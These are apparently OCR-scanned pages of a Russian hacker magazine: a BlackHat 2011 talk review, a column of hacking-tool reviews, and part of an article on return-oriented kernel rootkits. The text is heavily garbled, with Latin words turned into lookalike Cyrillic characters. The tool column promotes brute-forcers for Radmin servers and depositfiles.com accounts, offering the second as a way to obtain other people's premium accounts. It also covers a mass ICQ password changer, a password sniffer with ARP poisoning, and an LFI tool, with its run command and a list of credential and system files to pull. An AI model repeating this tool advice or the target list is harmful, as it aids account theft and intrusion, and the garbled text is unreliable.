модели оси у нас расположены такие протоколы, как НТТР(5), 5МТР, 
РТР. Вот про атаки на отказ в обслуживании на эти протоколы и 
шла речь. В 2009 году Вонг Онн Чи рассказал про атаки на отказ 
в обслуживании через Р05Т-запросы, что гораздо интереснее. К 
слову сказать, ни Майкрософт, ни Апач вначале даже за уязвимость 
это не посчитали — типа это просто фишка такая. Так как же это 
работает? Поле «СопІепІ-РепдОп» в НТТР-заголовке сообщает сер- 
веру, какова длина пакета. К примеру, «СопІепІ-РепдШ = 1000». В 
случае, если написать, что длина пакета = 1000, а отправить только 
1 байт, то сервер будет ждать остатков, держа коннект открытым и 
зарезервировав в памяти место. Ну естественно — ведь нужно же 
как-то заботиться о клиентах с медленным коннектом! Таким обра- 
зом, если послать 20 000 таких запросов с рандомной длиной с раз- 
личных ІР-адресов, то сервер просто не сможет обслуживать новые 
запросы, и произойдет отказ в обслуживании. Для демонстрации 
этого исследователи выпустили тулзѵ оѵѵазр.огд/іпбех.рЬр/ОѴѴАЗР 
НТТР Роз! Тооі . С ее помощью любой школьник сможет ОООЗ’ить 
неугодный ему сервер (привет скрипткидди, если ты дочитал до 
этого момента — тебе крупно повезло). Самое интересное, что пока 
не придумано адекватных мер для защиты и обнаружения такого 
рода атак, хотя некоторые идеи были озвучены в докладе. 
Переходим от нападения к защите. Еще ни одна конференция 



Пример грамотной презентации от Зутапіес, 
слайд #2 

ВІаскНаі не проходила без доклада про Х55. На этот раз вызвались 
ребята из Тгизіѵѵаѵе. Пару слов хочу сказать о компании Тгизіѵѵаѵе 
и их исследовательском подразделении Эрібег І_аЬз. Вообще эти 
парни выступают практически на каждой конференции, но, к сожа- 
лению, я ни разу не видел от них ничего стоящего. Либо баяны, 
либо попытка рассказать о совершенно новой области, но ограни- 
ченная только теоретическими описаниями возможных угроз. Тем 
не менее, сами люди по общению классные. Вот и на этот раз, чего 
только стоил доклад с громким названием «Наскіпд бте Раз! Рапе: 
зесигііу іззиез ѵѵібп 802.1 1 р, 05РС апб ѵѵаѵе» где предполагалось 
показать различные атаки на новые протоколы. В итоге все выли- 
лось в описание теоретических основ всех упомянутых сокращений 
и одного слайда о том, что там могут быть те же атаки, что и в дру- 
гих протоколах: всем бояться. Что касается веб-темы, то ребята из 
Тгизіѵѵаѵе в докладе «Х55: Эігееі РідЫ» по сути описали сборник 
довольно известных методик по защите отХ55-атак на примере 
того, как это работает в Моб Эесигііу (автор доклада является одним 
из разработчиков данного творения). В прошлом году уже был 
доклад «Оиг [аѵогііе Х55 Шегз апб Ьоѵѵ Іо Ьуразз бает» — видимо, 
ребята решили рассказать, как же можно защититься от всего этого, 
и какие методы защиты реализованы в Моб Эесигііу. 

Бизнес-приложения - новый 
тренд 

Про один тренд — мобильные ОС и девайсы — ты уже понял. Пора 
ознакомиться с еще одним. Это критичные бизнес-приложения 
уровня Епіегргізе, которые являются ядром практически каждой 
компании. Бизнес-приложения делятся на три типа: 

• малого размера (МВ ОШ се и подобное); 

• среднего размера (СРМ, интернет-магазины, управление челове- 
ческими ресурсами, групповая работа и так далее); 

• епіегргізе размера (ЕРР, ВРМ, РБМ и прочее). 

Вот об епіегргізе-уровне речь и пойдет. Одним из примеров ЕРР- 
системы (Епіегргізе Резоигсе Ріаппіпд - Система управления ресур- 
сами предприятия) является 5АР. Это наиболее крупный поставщик 
данных решений во всем мире. Что касается России, то у нас есть 
своя ЕРР- 1 С:Предприятие. Только если 1С используется в малом 
и среднем бизнесе, то 5АР используют компании, где в системе 
работают сотни или даже тысячи клиентов. В эту область до недав- 
него времени исследователи практически не лезли. Все началось 
приблизительно в 2006 году, когда был представлен один из первых 
докладов по техническим вопросам безопасности 5АР. В 2007 году 
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Мариано Нунез (тогда еще сотрудник компании СуЬзес) рассказал 
на конференции ВІаскНаІ про атаки на протокол ВЕС, используемые 
в 5АР. С тех пор я также начал заниматься этой темой и с 2009 года 
выступаю на конференциях именно по ней. К слову сказать, если 
в 2007-2008 году про безопасность 5АР было всего пара докла- 
дов в год, то в 2010 их было аж двенадцать! В 201 1 году, уверяю, 
будет не меньше. Собственно, и на этот раз Мариано представил 
новый доклад о том, как ломать ѵѵеЬ-интерфейсы 5АР-систем через 
интернет. Самое обидное, что это была моя тема, и я даже посылал 
запрос с ней на одну из прошлых конференций ВІаскНаІ, но мне 
тогда отказали. Видимо, сейчас организаторам эта тема показалась 
актуальной. Тем не менее, сам доклад Мариано на меня впечатле- 
ния не произвел, так как все это и даже больше я бы мог рассказать 
сам (да, я просто завидую). Самая грандиозная атака, представ- 
ленная на его слайдах, заключалась в том, что можно обойти 550- 
аутентификацию, добавив секретный заголовок в НТТР-запрос. Но 
главное даже не в том, насколько она опасна и проста, а в том, что 
данная бага известна в узких кругах с 2006 года! Да и на офици- 
альном сайте 5АР в разделе настроек 550 упоминается вскользь 
об этой проблеме, так что Мариано просто громко заявил о том, что 
было известно и ранее. Что ж — тоже неплохо, ведь пока еще мало 
кто понимает, что ЕРР-системы содержат массу уязвимостей. 

Теперь перейдем к моему докладу, в котором я осветил вопрос 
безопасности ЕРР-систем, показав, как можно найти их в интер- 
нете при помощи доодіе-хакинга; как атаковать юзеров через 
уязвимости в АсІісеХ-компонентах клиентского софта; а также как 
при помощи уязвимостей не просто получить шелл на сервере, а 
незаметно подменить банковский счет клиента компании на свой, 
а потом, получив перевод, поменять все обратно, скрыв следы. 
Вообще в бизнес-приложениях присутствует масса различных 
уязвимостей, но наиболее интересные - это архитектурные. Их пре- 
лесть заключается в том, что закрыть такую багу - непросто и небы- 
стро, а обновить установленную систему — еще дольше, так как это 
может потребовать столько времени, что в течение этого периода 



бизнес компании будет попросту 
остановлен. Хороший пример 
такой баги, который мы нашли 
во время анализа безопасности 
одного бизнес-приложения, — 
обход аутентификации в СУБД 
ОрепЕбде. Бага заключается 
в том, что когда пользователь 
вводит имя и пароль в клиент- 
ское приложение, они теорети- 
чески должны отправляться на 
сервер (причем в виде хэша) и 
сравниваться там со значением, которое лежит в базе. Но не тут-то 
было! На сервер отправляется запрос о попытке аутентификации, 
а от сервера приходит хэш пароля, который на клиенте сравнива- 
ется с введенным. В общем, более эпического провала я не видел. 
Вначале даже сложно было поверить в это. И это только один из 
примеров архитектурных уязвимостей в бизнес-приложениях, 
другие ты можешь почитать в моем докладе. Там же ищи инфор- 
мацию о том, как проводить пентест бизнес-приложений, и в чем 
заключаются его особенности. Про бизнес-приложения также рас- 
сказал Крис Гейтс, с которым мы в прошлом году писали модули для 
Меіазріоіі для атак на СУБД Огасіе. На этот раз он тоже ушел в сто- 
рону нового тренда и дополнил свой движок атаками на различные 
оракловые веб-приложения — такие как Огасіе Арріісаііоп 5егѵег 
и Огасіе Еизіоп МісІсІІеѵѵаге, что является основой для построения 
всех бизнес-приложений типа Огасіе Е-Ьизіпезз 5иі1е. 

Заключение 

В общем, тема бизнес-приложений сейчас активно развивается, так 
что если ты заинтересован в любых исследованиях в данной обла- 
сти (будь то взлом или аналитика), то пиши письма на РезеагсЫб 
сізесгд.сот, и, возможно, ты станешь следующим, кто поедет на 
Віаскбаі :). □с 




И такое бывает 
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5 лучших докладов 

ВІаскНаі 2011 



э За пределами АиІоВип: 
эксплуатация софтверных 
уязвимостей с помощью внешних 
накопителей 

Разного рода малварь вот уже многие годы использует функцио- 
нальность автозапуска ѴѴіпсІоѵѵз, приспособив в качестве одного 
из каналов распространения внешние накопители (и прежде 
всего флешки). Да, эту фичу всегда было легко отключить, но тому 
же самому 5іихпеІ это не помешало идти по миру через 115В- 
драйвы, опираясь на неизвестную ранее уязвимость ѴѴіпсІоѵѵз. В 
этом докладе Джон Лаример представил несколько новых тех- 
ник, которые может использовать малварь для автоматического 
выполнения зловредной загрузки с ІІ5В-накопителей и при этом 
вообще не зависеть от системы АиІоРип винды. Где тут секрет? 
Существует большое количество кода, который выполняется между 
ІІ8В-драйверами и десктопными программами, которые, к приме- 
ру, рендерят иконки и превьюшки для документов. Это открывает 
зесигііу-исследователям большое количество целей для эксплуа- 
тирования. Причем поскольку обычные пейлоады (вроде открытия 
шелла) здесь не всегда полезны, в докладе предложено несколько 
альтернативных нагрузок, которые немедленно предоставляют 
хакерам доступ к системе. Проблема касается не только ѴѴіпсІоѵѵз, 
что продемонстрировал ресерчер, когда сумел разблокировать 
экран Ыпих, вставив ІІ5В-флешку в ноутбук. 

Практические атаки на сотовые 
сети 0РВ5/ЕООЕ/ІІМТ5/Н5РА 

Еще несколько лет назад мало кто представлял, что для атаки на 
сотовую сеть можно будет использовать открытое доступное обо- 
рудование, стоимость которого не превышает $10 000. Дэвид Перес 
и Жозе Пико в своем докладе решили на практике продемонстри- 
ровать, насколько просто сейчас установить фейковую базовую 
станцию (Подие ВТ5), заставить телефон жертвы к ней подключить- 
ся и благодаря этому получить полный контроль над его общением 
через сотовый телефон. В основе атаки лежат две особенности 
сотовых сетей. Первая заключается в полном отсутствии взаимной 
авторизации в 6РР5 и ЕООЕ (26) сетях, что приводит к тому, что 
6РР5- и ЕОбЕ-устройства тотально уязвимы к такому виду атак. 
Смысл второй кроется в общем механизме работы, который реали- 
зован в телефонах, предназначенных для работы в ІІМТ5- и Н5РА 
(Зб)-сетях. В случае недостаточного сигнала они принудительно 
подключаются к сетям 6РР5/Е06Е, что позволяет использовать 
атаку не только на 26-, но и на 36-девайсы. 

Смартфон, подключенный по 115В? 
Эксплуатируем это! 

Подключение через ТЬе ІІпіѵегзаІ Зегіаі Виз (115В) окончатель- 
но стало стандартом де-факто как для зарядки смартфона, так и 
для обмена данными между ним и компьютером. Это в том числе 



касается іРЬопе, ВІаскВеггу, устройств на АпбгоісІ и т.п. В таких 
девайсах используется мощное программируемое ІІ5В-железо, 
позволяющее реализовать альтернативные варианты «общения» 
с компьютером. Добавляем сюда практически полное отсутствие 
защитных механизмов как со стороны компьютера, так и со сторо- 
ны мобильного устройства — и получаем целый ряд совершенно 
новых атак. Например, можно запрограммировать ІІ5В-железо 
смартфона так, чтобы при подключении к компьютеру он опреде- 
лялся как Нитап ІпІегРасе йеѵісе (НЮ), то есть фактически мышь и 
клавиатура. Дальше ничего не стоит отправить системе последова- 
тельность нажатий клавиш и движений мышью, выполняя любые 
действия. Авторы доклада, Анжелос бтавроу и Чжаоху Уонг, пока- 
зали также, как перевести смартфон в режим работы ІІ5В-хоста и 
получать контроль над другими мобильными девайсами, подключая 
их с помощью хитро собранного баіа-кабеля. 

* Деанонимизация ЫѵеСО ОС 

Традиционные методики криминалистики обычно основываются на 
исследовании образа жесткого диска, бпециалист может провести 
целый ряд экспертиз, в том числе общее исследование файлов, 
восстановление удаленных документов, построение временных 
диаграмм доступа к разным компонентам и т.д. Но если злоумыш- 
ленник использует для работы ЫѵебО (мотай на ус!), то привыч- 
ная модель проведения экспертизы летит в тартарары. Такие 66 
полностью загружаются в оперативную память и никак не взаи- 
модействуют с локальным диском. Это сводит на нет возможность 
проведения обычного исследования файловой системы. Как быть? 
Автор доклада, Эндрю Кэйз, поделился рядом техник для полного 
извлечения из памяти структуры файловой системы ЫѵебО, а также 
частичного восстановления ранее удаленного ее содержимого. 
Помимо этого докладчик представил методику, применяемую сей- 
час для анализа памяти приложения Тог, которое используется во 
многих ЫѵебО-дистрибутивах для анонимизации работы в бети и 
шифрования всего проходящего трафика. 

* Эксплуатация Мас'а на кухне 

Кто-то еще хочет сказать, что Мае — это исключительно безопасная 
система, для которой нет ни троев, ни эксплоитов? Чепуха! Парни 
Дино Дай Зови и Винченцо Иоццо решили прямо на Віаск НаКе 
провести кулинарное шоу и приготовить несколько сплоитов для 
Мае. Шеф-повар показал все стадии работы над блюдом, начи- 
ная с поиска и выбора правильных ингредиентов (уязвимостей) 
и заканчивая разными способами их приготовления (техниками 
эксплуатации), которые каждый может использовать на своей соб- 
ственной кухне. Продемонстрированные рецепты включают сплои- 
ты как для локального поднятия привилегий, так и для удаленного 
выполнения произвольного кода через браузер. В качестве жертвы 
была выбрана последняя версия Мае 65 X — 5поѵѵ Шеора гсі , а 
основным инструментом для приготовления сплоита стала ЮА Рго. 
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Программа: Ьатезсап 3 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$Іа/2008 5егѵег/7 
Автор: гесІзН 




Программа Ехіта ІСО Раззѵѵогсі 
СИапдег тазз 

ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/ѴІз*а/2008 5егѵег/7 
Автор 2бет. ВіІ Уа 




Меняем пароли ІСО 



Почти год назад я уже описывал в нашей ру- 
брике замечательный брутдля Рабтіп под на- 
званием І_ате5сап. Настало время предста- 
вить новую версию этой рульной программы. 
Итак, Иатезсап 3 — это тулза для восстанов- 
ления забытых паролей ксерверам Пабтіп 2.x 
и логинов/паролей к серверам Рабтіп 3.x. 
Возможности и особенности проги: 

• Многопоточность; 

• брут серверов КасІтіп 2.x и 3.x 
по словарю; 

• специальный многопоточный сканер 
портов с пинговкой и поддержкой 
диапазонов любого размера, а также 
группировкой хостов по результатам 
сканирования; 

• возможность сохранения/загрузки 
состояния сканирования; 

• экспорт сбрученных хостов в С5Ѵ 
или НТМІ_; 

• запуск ѵіеыег-’а для сбрученных 
хостов прямо из программы (логин/ 
пароль вводится автоматически); 

• поддержка 50СК5 для ТСР- 
соединений; 

• подробнейший хелп с описанием 
протокола авторизации КасІтіп; 

• открытый исходный код; 

• автоматическая проверка 
обновлений . 

В качестве бонуса на нашем дискеты сможешь 
найти и прогу ІрОеоВазе от мембера Античата 
НІМІКАТ’а. Данная вещь предназначена для 
генерации диапазонов адресов для брута по 
конкретным округам, регионам и городам. 



На очереди в нашем сегодняшнем обзоре 
известнейшая в асечных кругах прога для 
массовой смены паролей науинах. Пароль 
меняется, даже если в нем присутствуют 
спецсимволы или кириллические символы. 
Для начала работы стулзой необхо- 
димо выбрать файл со списком вида 
«номер; пароль», затем выбрать пароль для 
замены (фиксированный или случайный, 
также можно выбрать символы, из которых 
будет формироваться случайный пароль). 
Далее ставим паузу между сменой пароля (О, 
если используются прокси) и опционально 
выбираем файл с проксями. 

При нажатии кнопки «Старт» создается 
файл «пе\л/раз5_дата_время.ІхІ» р в кото- 
рый будут помещаться данные в формате 
«номер;новый_пароль;старый_пароль». 
Следуетучесть, что возможен случай, когда 
запрос на изменение пароля выслан, а ответ 
не получен — программа выдаст«Рециез1; 
[аііесі. СЬеск 1Ье оШ апб пеѵѵ раззѵѵогсі 2». 

В таком случае может пригодиться старый 
сохраненный пароль. 

Автор пассченджера судовольствием 
ответит на все твои вопросы тут: аѵіиЬ. 
ги/201 0/04/26/ехіга- ісд- раззѵѵогсі -сЬапдег- 
тагз.ЫтІ . 

Программа: 0х4553-1піегсеріег 
ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/ѴІ$*а/2008 5егѵег/7 
Автор: агез 

На очереди знаменитый снифер 0x4553- 
Іпіегсеріегот русского разработчика агез’а. 
Данная прога представляет из себя целый 
хакерский комбайн и умеет следующее: 





• Перехватывать пароли ІСС2/ІКС/АІМ/ 
РТР/ІМАР/Р0РЗ/5МТР/І_0АР/ВІ\ІС/50СК5/ 
итт?/ѵіт/ттр/сУ5>/ТЕінЕТ/т/\/ос++/ 
ѴІ\ІС/МѴ5(2І_/ОКАСІ_Е 

• перехватывать сообщения ІС(2/АІМ/ 
ЗАВВЕК/УАНОО/М5М/6АОи-САОи/ІКС/МКА 

• менять МАС-адреса сетевых карт; 

• просматривать трафик в сыром виде, 
с возможностью фильтрации; 

• перехватывать данные на неопреде- 
ленных портах с помощью специального 

еХігете- режима; 

• сохранять пакеты в файл рсар-формата 
и проводить оффлайн-анализ дампов; 

• удаленно анализировать трафик через 
КРСАР демона; 

• работать со встроенным АКР роізоп; 

• перехватывать и сохранять в еті- 
формате сообщения РОРЗ и 5МТР; 

• сканировать АКР и йНСР (также в 
прогу включен и невидимый йНСР сер- 
вер). 

Описывать работу всех функций снифера 
в данной рубрике бессмысленно, поэтому 
советую заглянуть на его официальный сайт 
іпІегсеріег.пегРги и внимательно изучить 
любезно предоставленные автором видео- 
туториалы к проге. 

Программа ІІпЗЬогШВІ. 

ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/Ѵізіа/2008 5егѵег/7 
Автор: аѵГиИ 

Известно, что короткие ссылки, генерируе- 
мые специальными сервисами для укора- 
чивания ссылок, могут скрывать за собой не 
вполне безопасный контент. Эта программа 
поможеттебе увидеть, куда ведут потенци- 
ально опасные ссылки. 

Прога следитза буфером обмена и, если 
находит в нем короткую сгенерированную 
ссылку, ищет, куда идет перенаправление 
по ней. Результат выдается в виде всплы- 
вающего сообщения. 

После запуска ІІп5Ьог1:ІІНІ_ отображается 
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в трее в виде зеленого флажка. Меню для 
управления вызывается левой кнопкой 
мыши. Из меню можно отключить или 
включить мониторинг буфера. Меню «Ыпк» 
позволяет добавить/удалить сервисы корот- 
ких ссылок. 

По дефолту поддерживаются следующие 
популярные сервисы: 

асі.ѵщ асідіх. сот, аііигі . сот, 

Ь23.ги., Ьііі.іу, Ьисіигі . сот, 
сіск.ги, сіі . §5 у Пу2.ы5^ §оо.§1,, 
ісіек. пе-Щ І5.§сС тооигі.сот., 
тигі.кг, пп.гѵР, пб-Рм.іп., ом.іу, 
рпіі.те, бііогі.соітц Бп.іт., 

Бпіригі . сот, ііпу.сс, ііпуигі . сот, 
іг.іігц и. пи, игі.іе, м31:.ог§., 
ммл/.х. Бе, уер.іі:, уоигІ5.ог§ 

Клик по всплывающему сообщению приве- 
дет к открытию конечной ссылки (туда, куда 
перенаправляет короткая). Программа под- 
держивает многократные перенаправления 
по коротким ссылкам. 

За поддержкой и ответами на вопросы обра- 
щайся на официальную страницу програм- 

м ы : аѵІиЬ.ги/201 0/06/30/и пзб о Ни гі.біті . 

Программа: ОерозіТРіІез Вгиіе 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: Человек 




Брут аккаунтов сІерозіШез.сот 

Очень часто, когда возникает необходи- 
мость быстро и безболезненно скачать 
что-либо с известного файлообменника 
сІерозіШІез. сот, тебе приходится просма- 
тривать десятки навязчивых баннеров и 
ждать какое-то время перед появлением 
ссылки на скачивание. При этом скачивание 
в бесплатном режиме проходит на крайне 
невысокой скорости. Именно в таких слу- 
чаяхтебе пригодится утилита ОерозііРіІез 
Вгиіе. 

Особенности брутфорса стандартны для 
программ такого рода: 

• Брут по списку логин : пароль; 

• многопоточность; 

• работа без прокси; 

• простота в использовании; 

• высокая скорость. 

С помощью данной программы ты легко смо- 
жешь заполучить необходимое количество 
голд-аккаунтов для удобного скачивания 
файлов. 



Программа: №тар 
ОС: *піх/ѵѵіп 
Автор: АидизТо Регеуга 




Раскручиваем инклуды 

ІЛтар — это крайне полезная тулза для 
автоматизации действий, направленных не 
на нахождение уязвимости, а уже на извле- 
чение пользы с сайта, уязвимого к І_РІ (Іосаі 
іііе іпсіисіе). 

Особенности и функционал проги: 

• Кроссплатформенность 
(написана на Питоне); 

• автоматическое определение ОС 
(ыіпсіоыб^ Ііпих); 

• автоматическое обнаружение корня 
файловой системы; 

• поиск дефолтных файлов для серверов 
на базе Ііпих и ыіпсіоыб; 

• поиск паролей в файлах конфигурации; 

• поддержка Ьавіс-аутентификации 
(параметры «--изег» и «--раззм») ; 

• подстановка пиіі-байта для обхода 
контролирующих механизмов (параметр 
«- -пиіі») ; 

• формирование отчета о работе 
(параметр «- -оиіриі:») ; 

• поддержка ргоху (параметр 
«- -ргоху») . 

Запускается скрипт следующим образом: 

руіііоп Ібшар.ру -1: М1:1:р : //ыыы.іезі: . 
сот/ 5 5 . рбр?ра§е=[І_РІ] 

При запуске без параметров ты сможешь 
увидеть небольшой хелп по скрипту. 

Пример дефолтных файлов разных ОС, кото- 
рые будет искать прога: 

І_іпих 

ѵаг/1о§/Іі1:1:рсІ/ассе5 5_1о§ 

ргос/зеі-р/епѵігоп 

ргос/ѵегзіоп 

ѵаг/1о§/арасІіе2/ассе5 5 . 1о§ 
ѵаг/1о§/Іі1:1:рсІ-ассе5 5 . 1о§ 
и5г/1оса1е1:с/арасІіе22/ІтІ:1:рсІ . соп-р 
еіс/арасІіе2/арасІіе2 . соп-р 
еіс/іііірсі/соп-р/ітіііірсі . соп-Р 
ѵаг/1о§/ту5ЦІсІ . 1о§ 
еіс/тузці/ту . сп-р 
ѵаг/ІіЬ/тузцІ/тузцІ/иБег .МУР 
еіс/іпіііаЬ 
еіс/5у5с1:1 . соп-Р 
еіс/раззысі 
еіс/1:5 . соп-Р 



еіс/сіатаѵ/сіатсі . соп-р 
е1:с/с1атаѵ/-Рге5Ііс1ат. соп-р 
еіс/са-сегІііРісаІіеБ . соп-р 

ІЛІІПСІОМБ 
Ьооі: . іпі 

АррЗегѵ/МуЗрі/сІаіа/туБЦІ/иБег.МУО 
ІлІІМ00ІлІ5/5уБІ:ет32/сІгіѵег5е1:с/Ііо5І:5 
ІлІІМООІлІБ/ гераіг/5АМ 

Как видишь, Ііітар — это очень хорошее 
средство для автоматизации обычных 
рутинных действий с инклудами. 

ПрограммаНСО Раззѵѵогсі 
РесаІІіпд 

ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$+а/2008 5егѵег/7 
Автор: Кагаз 




Восстанавливаем пароль от Аси 

В заключение спешу представить твоему 
вниманию еще одну полезную асечную про- 
гу — I СО Раззѵѵогсі РесаШпд. 

Наверняка ты когда-либо забывал пароль 
от I СО, сохраненный в клиенте (ОІР, Лтт, 
официальная ІСС и так далее), долго 
медитировал и пытался его вспомнить. 
Конечно, можно воспользоваться систе- 
мой ретрива для установки нового пароля 
или же использовать различные програм- 
мы для расшифровки хешей, сохраненных 
в клиентах. Но первый способ неудобен и 
длителен, а второй — не всегда срабатыва- 
ет, поэтому проще всего воспользоваться 
данной программой, которая имитирует 
сервер авторизации, ждет подключения, 
кушает III N и пароль, а затем сообщает его 
тебе. 

Схема работы с прогой достаточно проста: 

1. Запускаем ІСС клиент с сохраненным в 
нем паролем. 

2. Указываем свой ІР в качестве сервера 
авторизации (можно указать 127.0.0.1). 

3. Пробуем подключиться. 

4. Видим свой пароль (если в клиенте от- 
мечена галка «Безопасный вход», тулза не 
сможеттебе помочь). 

5. Меняем сервер подключения в клиенте 
обратно на Іодіп.ісд.сот . 

Автор с удовольствием ответит на твои 
вопросы и предложения в топике Ь гит. 
азесЬка.ги/зЬоѵѵіЬгеас1.рЬр?1:=1 09235 . т 
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ДЬЯВОЛЬСКИЕ 

РУТКИТЫ 

Александр Зккерт рассказывает о гіпдО-руткитах 

ѳТема руткитов всегда актуальна. Тем более, если речь идет о новом 
типе руткитов - использующих технологию возвратно- 
ориентированного программирования. Вводную статью по этой теме 
мы представляли на твой суд в прошлом номере ][, сегодня же мы по- 
стараемся развить ее в более практическом направлении. Хотя, ко- 
нечно, исходников не жди - все реальные наработки по этой теме сей- 
час находятся в глубоком привате. 



На сегодняшний день использование драйверов для взаимодей- 
ствия с «нутром» системы (особенно для систем безопасности 
ѴѴіпсІоѵѵз) — устоявшаяся практика. Многие программы использу- 
ют их как окно для доступа в нулевое кольцо. Впрочем, тут стоит 
отметить один очевидный факт: кроме основных функций подоб- 
ные драйверы оснащены также механизмами взаимодействия, 
предназначенными для обмена данными между драйвером и 
программными компонентами, работающими в пользовательском 
режиме. Заметь, код, работающий на высоком уровне приви- 
легий, получает данные от кода, работающего на уровне при- 
вилегий более низком. Это значит, что на плечи разработчика 



ложится непростая задача - обеспечить проверку таких данных, 
потому что если пустить этот процесс на самотек, то в лучшем 
случае будут грабли со стабильным функционированием такого 
драйвера, в худшем - можно поставить под угрозу всю ОС. 




Уязвимостей в ядре ѴѴіпсіоѵѵб не так много, но время от времени 
они появляются: иногда в виде призрачных намеков, иногда - в 
виде убедительных отверстий толщиной с главный калибр линко- 
ра «Миссури». Вспомним, например, 2008 год, когда впервые поя- 
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ІОСИ Риггег в действии 



вилась информация об уязвимости М508-025, эксплуа- 
тация которой позволяла выполнить произвольный код 
в режиме ядра и достичь благодаря этому локального 
повышения привилегий на операционных системах 
ѴѴіпбоѵѵз ХР и ѴѴіпбоѵѵз Бегѵег 2003. Это далеко не пер- 
вая уязвимость, которая была обнаружена в ѵѵі п32к. 
зуз, и я абсолютно уверен, что и не последняя. Такая 
ситуация сложилась в первую очередь из-за того, что 
изначально графическая подсистема работала в режи- 
ме пользователя (по ѴѴіпбоѵѵз ЫТ 4.0 включительно), но 
позже, чтобы сократить количество ресурсоемких опе- 
раций по переключению потока в режим ядра, разра- 
ботчики ѴѴіпбоѵѵз решили перенести графическую под- 
систему в Ріпд-0. Однако, в силу достаточно большого 
объема кода и архитектурных особенностей, во время 
этого переноса не было уделено достаточно внимания 
вопросам безопасности, что и способствовало появ- 
лению в ѵѵіп32к.зуз большого количества уязвимостей 
разной степени опасности. 

Вообще подсистема \л/іп32к.зуз — довольно дырявая 
штукенция. Например (спасибо Лозовскому за подгон 
инфы), недавно новая 0-бау уязвимость была обнару- 
жена в этой графической подсистеме винды. Атаке под- 
вергся ѴѴіпАРІ РіЮиегуРедізІгуѴаІиез, используемый 
для получения различных значений ключей реестра с 
помощью таблицы запросов и имеющий ЕпІгуСопІехІ в 
качестве буфера вывода. Для успешного обхода защиты 
злоумышленник должен создать поврежденный ключ 
реестра или управлять ключами, доступ к которым раз- 
решен только обычным пользователям. 

Детали общей мозаики 

Как я говорил в начале этой статьи, для успешной 
реализации возвратно-ориентированного руткита 
нам все же понадобится гО-уязвимость, которая 
позволит подчинить себе поток выполнения про- 
граммного кода на ядерном уровне. Точнее, нужен 
какой-нибудь драйвер, который содержит в себе баг 
с переполнением буфера, который позволит злоу- 
мышленнику овладеть стеком ядра. В основе руткита, 



созданного с помощью возвратно-ориентированного 
кодинга, будет ІРР-пакет, а вернее — целый меха- 
низм, известный под общим названием «диспетчер 
ввода-вывода» и призванный взаимодействовать 
между гіпдЗ и гіпдО. Существует достаточно много 
хорошо и не очень документированных системных 
механизмов, которые могут быть использованы для 
организации взаимодействия кода пользовательского 
режима с драйверами режима ядра. Самыми функ- 
циональными и наиболее часто используемыми явля- 
ются те механизмы, которые представляются диспет- 
чером ввода-вывода. В конце концов, именно они и 
создавались разработчиками операционной системы 
для подобных задач. Давай вспомним, как обычно 
организуется работа с диспетчером ввода-вывода со 
стороны драйвера и приложения. 

После загрузки драйвер создает именованный 
объект ядра «устройство», используя функцию 
ІоСгеаІеОеѵісе. Для обработки обращений к соз- 
данным устройствам драйвер ассоциирует со своим 
объектом набор функций-обработчиков. Эти функ- 
ции вызываются диспетчером ввода-вывода при 
выполнении определенных операций с устройством 
(открытие, закрытие, чтение, запись и так далее), а 
также в случае некоторых системных событий (напри- 
мер, завершения работы системы или монтирования 
раздела жесткого диска). Структура, описывающая 
объект «драйвер», называется О Р I ѴЕ Р_0 В Э ЕСТ, 
а эти функции - ІРР-обработчиками (ІРР — 1/0 
Редиезі Раскеі). Их адреса драйвер помещает в поле 
□ ПІѴЕР_ОВЗЕСТ->МаіогЕипс1:іоп, которое является 
массивом указателей на ІРР-обработчики и имеет 
следующий прототип: 

■Ьуресіе-Р 

ІЧТ5ТАТІІ5 

( *Р0КІѴЕРМЭІ5РАТСН) ( 

іп Б’ЬгисІ: _йЕѴІСЕ_ОВЗЕСТ *ОеѵісеОЬдес1: , 

іп Бѣгисі: _ІКР *Ігр 

); 




> СІ ѴСІ 

На ОѴО-дискеты 
найдешь классный 
труд «Уязвимости в 
драйверах режима 
ядра для ѴѴіпсІоѵѵз» 
от исследователя 
ЕзадеІаЬ Дмитрия 
Олексюка. 




НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

Два интересных блога: 

• іООги.ѵехіШит.огд : 

• іѵапІеГОи.іихіатіІу.огд 
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Появились примеры возвратно-ориентированного кодинга под архитектуру 5РАКК 

Появление техники «заимствованных кусков кода» от Себастьяна Крамера ф- 

Первый червь, который использовал переполнение буфера (СобеКесІ) О 

Первый эксплоит «возврата в библиотеку» от Зоіаг Оезідпег О 



Появление первых сообщений о переполнениях буфера на Видігаск’е 



1970 



1990 



1980 



И 



2010 



2000 



СЧІ СЧІ 



Первая публикация о переполнении буфера 
Первая эпидемия в интернете - появление «Червя Морриса» 

Статья во РИгаск чувака по имени АІерІі Опе «ЗшазНіпд (Не Зіаск (ог Рип апб РгоШ» 

Статья МегдаГз в журнале РИгаск на тему «продвинутых эксплоитов возврата в библиотеку» О 

Ноѵаѵ ЗНасНат ввел понятие возвратно-ориентированного кодинга для х86 
Появились первые примеры возвратно-ориентированного кодинга 




Параметр ОеѵісеО^'есІ указывает на конкретное устройство 
(у одного драйвера их может быть много), а Ігр - на структуру, 
содержащую различную информацию о запросе к устройству: 
контрольный код, буферы для входящих и исходящих данных, 
статус завершения обработки запроса и многое другое. 

Эксплойт? 

Мы постараемся заэксплойтить самую распространенную и 
часто встречающуюся уязвимость переполнения буфера. Это 
легко сделать путем перезаписи буфера в созданном драйвером 
«устройстве», тем самым заместив возвращаемое значение в 



стеке таким образом, чтобы оно указывало на последователь- 
ность ядерных инструкций «РОР Е5Р; ПЕТ», а также следую- 
щее в стеке значение, чтобы оно указывало на точку входа в 
возвратно-ориентированную программу. 

Переписав эти восемь байт, мы сможем сконфигурировать 
стек так, чтобы он указывал на начало нашей возвратно- 
ориентированной программы. Любой подобный небезопасный 
код позволяет легко реализовать нашу атаку: простая уязви- 
мость в ядре или любом драйвере, загруженном в адресное 
пространство ядра, является достаточным условием, чтобы 
скомпрометировать всю систему и выполнить злонамеренный 



Виртуальные машины 
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возвратно-ориентированный код. Правда, для реализации этих 
коварных планов нужно решить один существенный вопрос 
— куда запихнуть имидж нашей программы? Есть два пути. 
